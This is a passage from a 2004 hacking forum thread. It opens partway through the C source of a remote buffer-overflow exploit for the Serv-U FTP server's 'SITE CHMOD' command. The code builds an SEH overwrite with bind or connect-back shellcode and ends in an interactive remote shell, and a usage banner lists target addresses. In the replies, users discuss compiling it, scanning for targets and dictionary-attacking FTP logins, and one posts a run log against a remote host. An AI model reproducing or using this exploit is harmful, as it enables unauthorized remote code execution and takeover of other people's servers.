time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("[-] Connection closed.\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("[-] Connection closed.\n");
return;
}
}
}
}

void main(int argc, char **argv)
{
struct sockaddr_in sa, server, client;
WSADATA wsd;
SOCKET s, s2, s3;
int iErr, ret, len;
char szRecvBuff[MAX_LEN];
int i, j, iType;
int iPort=21;
char *ip=NULL, *pUser="ftp", *pPass="ftp@ftp.com", *cbHost=NULL;
char user[128], pass[128];
BOOL bCb=FALSE, bLocal=TRUE;
unsigned short shport=53, shport2=0;
unsigned long cbip;
unsigned int timeout=5000, Reuse;
char penetrate[255],cbHost2[20];
int seh_offset;

printf( "Serv-U FTPD 3.x/4.x \"SITE CHMOD\" remote overflow exploit V%s\r\n"
"Bug found by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)\r\n"
"Welcome to HUC website http://www.cnhonker.com\;r\n\n"
   , VERSION);

seh_offset = SEH_OFFSET;

if(argc < 4)
{
usage(argv[0]);
return;
}

for(i=1;i<argc;i+=2)
{
if(strlen(argv[i]) != 2)
{
usage(argv[0]);
return;
}
// check parameter
if(i == argc-1)
{
usage(argv[0]);
return;
}
switch(argv[i][1])
{
case 'i':
ip=argv[i+1];
break;
case 't':
iType = atoi(argv[i+1]);
break;
case 'f':
iPort=atoi(argv[i+1]);
break;
case 'p':
pPass = argv[i+1];
break;
case 'u':
pUser=argv[i+1];
break;
case 'c':
cbHost=argv[i+1];
bCb=TRUE;
break;
case 's':
shport=atoi(argv[i+1]);
break;
case 'd':
if(argv[i+1][0] != '/')
strcpy(szDirectory, "/");
strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);

if(szDirectory[strlen(szDirectory)-1] != '/')
strcat(szDirectory, "/");

// correct the directory len
for(j=0;j<(strlen(szDirectory)-1)%8;j++)
strcat(szDirectory, "x");

printf("%d:%s\r\n", strlen(szDirectory), szDirectory);
seh_offset = seh_offset - strlen(szDirectory)+1;
break;
}
}

if((!ip) || (!user) || (!pass))
{
usage(argv[0]);
printf("[-] Invalid parameter.\n");
return;
}

if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return;
}

if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
{
usage(argv[0]);
printf("[-] Invalid port.\n");
return;
}

_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
user[sizeof(user)-1]='\0';
_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
pass[sizeof(pass)-1]='\0';
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode

// Penetrate through the firewall.
if(bCb && shport > 1024)
{
strncpy(cbHost2, cbHost, 20);
for(i=0;i<strlen(cbHost); i++)
{
if(cbHost[i] == '.')
cbHost2[i] = ',';
}

sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);

//printf("%s", penetrate);
}
else
{
sprintf(penetrate,"TYPE I\r\n");
}

// fill the "site chmod" command
strcpy(szCommand, "site chmod 777 ");

// fill the directory
if(szDirectory[0])
strcat(szCommand, szDirectory);

// fill the egg
for(i=0;i<seh_offset%8;i++)
strcat(szCommand, "\x90");
//strcat(szCommand, "BBBB");

// fill the seh
for(i=0;i<=(seh_offset/8)*8+0x20;i+=8)
{
strcat(szCommand, JMP_OVER);
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
}

// fill the decode
strcat(szCommand, decode);

// fill the shellcode start sign
strcat(szCommand, sc_start);

// fill the shellcode
if(bCb)
{
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9393;
cbip = inet_addr(cbHost)^0x93939393;
memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
memcpy(&cbsc[IP_OFFSET], &cbip, 4);
strcat(szCommand, cbsc);
}
else
{
// bind shellcode
shport2 = htons(shport)^(u_short)0x9393;
memcpy(&sc[BIND_OFFSET], &shport2, 2);
strcat(szCommand, sc);
}

// fill the shellcode end sign
strcat(szCommand, sc_end);

// send end
strcat(szCommand, "\r\n");

if(strlen(szCommand) >= sizeof(szCommand))
{
printf("[-] stack buffer overflow.\n");
return;
}

// printf("send size %d:%s", strlen(szCommand), szCommand);

__try
{
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}

s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d",GetLastError());
__leave;
}

sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
sa.sin_addr.S_un.S_addr=inet_addr(ip);

setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
__leave;
}
printf("[+] Connect to %s:%d success.\n", ip, iPort);

if(bCb)
{
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

server.sin_family=AF_INET;
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
server.sin_port=htons((unsigned short)shport);

setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));

Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));

if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
{
printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
printf("[-] You must run nc get the shell.\n");
bLocal = FALSE;
//closesocket(s2);
//__leave;
}
else
{
printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
listen(s2, 1);
}
}

for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv: %s", szRecvBuff);

if(szRecvBuff[0] == '5')
{
printf("[-] Server return a error Message.\r\n");
__leave;
}

iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Send buffer error:%d.\n", WSAGetLastError());
__leave;
}

if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send shellcode %d bytes.\n", iErr);
else
printf("[+] Send: %s", szSend[i]);
}

printf("[+] If you don't have a shell it didn't work.\n");

if(bCb)
{
if(bLocal)
{
printf("[+] Wait for shell...\n");

len = sizeof(client);
s3 = accept(s2, (struct sockaddr*)&client, &len);
if(s3 != INVALID_SOCKET)
{
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s3);
}
}
}
else
{
printf("[+] Connect to shell...\n");

Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);

ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}

printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s2);
}

}

__finally
{
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
WSACleanup();
}

return;
}

QUOTE

Serv-U FTPD 3.x/4.x "SITE CHMOD" remote overflow exploit V1.0
Bug found by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com;r

Usage: C:\Exploits\suxpl.exe   <-i ip> <-t type>
[-u user] [-p pass] [-d dir]
[-f ftpport] [-c cbhost] [-s shellport]

[type]:
0    0x7ffa4a1b Serv-U v3.0.0.20~v4.1.0.11 GB 2K/XP ALL
1    0x7ffa2186 Serv-U v3.0.0.20~v4.1.0.11 BG 2K/XP ALL
2    0x6dee6713 Serv-U v3.0.0.20~v4.1.0.11 KR 2K SP4
3    0x77886713 Serv-U v3.0.0.20~v4.1.0.11 EN 2K SP4
4    0x76b42a3a Serv-U v3.0.0.20~v4.1.0.11 EN XP SP1

BlackBoard

Jan 26 2004, 09:44 PM

got also error with 4 c++ compiler programs, whats my mistake?
why do you just post the sourcecode and not the exe file?

TheOther

Jan 26 2004, 10:27 PM

I've got no problem to compile it under ms C++.

Next problem is to find targets en to find the OS.

To find some, I will try to get the banners on port 21 and then do a dict-attack to grant access.

But what can we use to find out what kind of OS-edition they are using?

Or do you know better ways to find targets?

Planquadrat

Jan 26 2004, 10:52 PM

@BlackBoard

sorry but i dont think that's a good idea to post a DL link here for the .exe file because (maby) to many kiddies are take it to rehacking and even if you dont get a shell with this sploit the server is crashed 100% and that is not in my interest.

SkyRaVeR

Jan 26 2004, 11:40 PM

yeah - think so, too... kiddies who don't know @least how 2 compile shut not rehaXX ! no .exe from my side - btw. th@nx for the servu3/4 thingie... worXX fine 4 me !

Nexcess

Jan 27 2004, 12:03 AM

QUOTE (SkyRaVeR @ Jan 26 2004, 11:40 PM)

yeah - think so, too... kiddies who don't know @least how 2 compile shut not rehaXX ! no .exe from my side - btw. th@nx for the servu3/4 thingie... worXX fine 4 me !

because yeah, people who can't type in plain english are no where near as bad off as people who cant get something compiled.

heh...

vnet576

Jan 27 2004, 12:10 AM

What he's saying is that you should not be breaking into other people's machines if you can't even understand the code. And don't bullshit me and say that you're gonna use this on you're own server...you don't need the exploit w/ shell to audit you're server..the regular POC should suffice.

Train25

Jan 27 2004, 12:23 AM

QUOTE (vnet576 @ Jan 26 2004, 08:10 PM)

What he's saying is that you should not be breaking into other people's machines if you can't even understand the code. And don't bullshit me and say that you're gonna use this on you're own server...you don't need the exploit w/ shell to audit you're server..the regular POC should suffice.

I think its time to close registration and clean the board of all the script kiddies. Nothing ticks me off more then having to read through script kiddy comments asking to have it compiled and handed to them on a silver platter. If they dont know how to compile their own code then they should just stop typing until they have something interesting to say.

Thats my rant for the week

Nexcess

Jan 27 2004, 12:43 AM

QUOTE

I think its time to close registration and clean the board of all the script kiddies.

Cool! Can we purge the egomaniacs too? Not everyone has time to learn a second or third language. Even if they try, you can't just pick up a 'learn c in 24 hours' book and be coder of the year tommorrow.

edit: whats bad? this is bad

88 replies
Attached File ( Number of downloads: 808 ) <--- random example

Ill take the 'script kids' over the leechers any day who can't even be troubled to say thank you.

Sw0rdfish

Jan 27 2004, 01:21 AM

Get compiled, right!! But not shell code is spawned on port 53 >_<
Only crashes de servu

(Tested on my computer)

Copkill

Jan 27 2004, 07:31 AM

i have compiled but become no shell

[+] Connect to xxx.xx.xx.172:666 success.
[-] Bind port on xx.xx.xx.xxx:53 error. <----error ???
[-] You must run nc get the shell.
[+] Recv: 220 ready...
[+] Send: USER Cop
[+] Recv: 331 User name okay, need password.
[+] Send: PASS Cop
[+] Recv: 230 User logged in, proceed.
[+] Send: TYPE I
[+] Recv: 200 Type set to I.
[+] Send shellcode 791 bytes.
[+] If you don't have a shell it didn't work.